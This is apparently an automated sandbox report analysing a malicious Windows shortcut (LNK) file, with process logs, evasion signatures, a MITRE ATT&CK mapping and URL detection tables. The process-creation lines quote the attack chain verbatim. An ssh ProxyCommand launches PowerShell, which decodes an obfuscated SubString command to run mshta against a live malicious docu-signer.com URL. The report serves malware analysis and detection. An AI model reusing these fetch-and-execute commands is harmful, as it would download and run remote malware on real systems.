Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1866
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 651
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7496 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 | Thread sleep count: 1495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 | Thread sleep count: 1866 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep count: 1403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 651 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7960 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2680411919.0000025E2B65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2678249284.0000025E25E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2678285013.0000025E25E45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWdClass
Source: ssh.exe, 00000001.00000002.2676527197.000002931A8DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'alc15y7xi6izdmshta https://docu-signer.com/api/uz/0912545164/index.mp4alc15y7xi6izd'.substring(13, 57)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Process Discovery (11); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (23)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Email Collection (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID: 1582824; Sample: DypA6KbLrn.lnk; Start date: 31/12/2024; Architecture: WINDOWS; Score: 80)

  • Root: DNS/IP docu-signer.com
  • Root signatures: Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 4 other signatures
  • ssh.exe 2 started (signature: Windows shortcut file (LNK) starts blacklisted processes)
      • powershell.exe 7 started (signature: Windows shortcut file (LNK) starts blacklisted processes)
          • powershell.exe 7 started (signature: Windows shortcut file (LNK) starts blacklisted processes)
              • mshta.exe 16 started
                  • DNS/IP: docu-signer.com 104.21.87.65, 443, 49706, 49707 CLOUDFLARENETUS United States
      • conhost.exe 1 started
  • svchost.exe 1 1 started
      • DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
DypA6KbLrn.lnk | 32% | ReversingLabs | Shortcut.Trojan.Pantera |
DypA6KbLrn.lnk | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docu-signer.com/api/uz/0912545164/index.mp4L | 100% | Avira URL Cloud | malware |
https://docu-signer.com/W | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/phish-bypassG | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/styles/cf.errors.css$ | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/styles/cf.errors.css4 | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4C: | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556374gU | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637L | 0% | Avira URL Cloud | safe |
https://docu-signer.com/S | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp44 | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:p | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4 | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/phish-bypasstp4y | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4H | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssD | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4... | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4$global:? | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/styles/cf.errors.css | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssL | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/phish-bypassg.mp4T | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4indows | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4p | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4t | 100% | Avira URL Cloud | malware |
https://docu-signer.com/api/uz/0912545164/index.mp4q | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637$fE | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4y | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637z | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4x | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637ent( | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/phish-bypass | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4R | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637a | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637fn | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4c | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637m | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...o | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/phish-bypassQ | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...x | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637rg | 0% | Avira URL Cloud | safe |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637 | 0% | Avira URL Cloud | safe |
https://docu-signer.com/api/uz/0912545164/index.mp4f | 100% | Avira URL Cloud | malware |
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...u | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
docu-signer.com | 104.21.87.65 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://docu-signer.com/api/uz/0912545164/index.mp4 | true | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/styles/cf.errors.css | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://docu-signer.com/api/uz/0912545164/index.mp44 | mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/styles/cf.errors.css$ | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/ | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/learning/access-management/phishing-attack/dg | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/cdn-cgi/phish-bypassG | mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/Tf | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/S | mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/W | mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4C: | mshta.exe, 00000005.00000002.2676736474.00000178AC4E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637L | mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/styles/cf.errors.css4 | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556374gU | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4L | powershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:p | mshta.exe, 00000005.00000002.2678000406.00000178AC670000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4H | mshta.exe, 00000005.00000002.2677825306.00000178AC620000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/phish-bypasstp4y | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssD | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m | mshta.exe, 00000005.00000002.2681800480.00000180AF285000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.cloudflare.com/5xx-error-landingt | mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/api/uz/0912545164/index.mp4$global:? | powershell.exe | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4... | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.cloudflare.com/5xx-error-landingh | mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssL | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docu-signer.com/cdn-cgi/phish-bypassg.mp4T | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4indows | powershell.exe, 00000004.00000002.1461122736.000002A8399B0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4t | mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4q | powershell.exe, 00000004.00000002.1462221215.000002A83B440000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
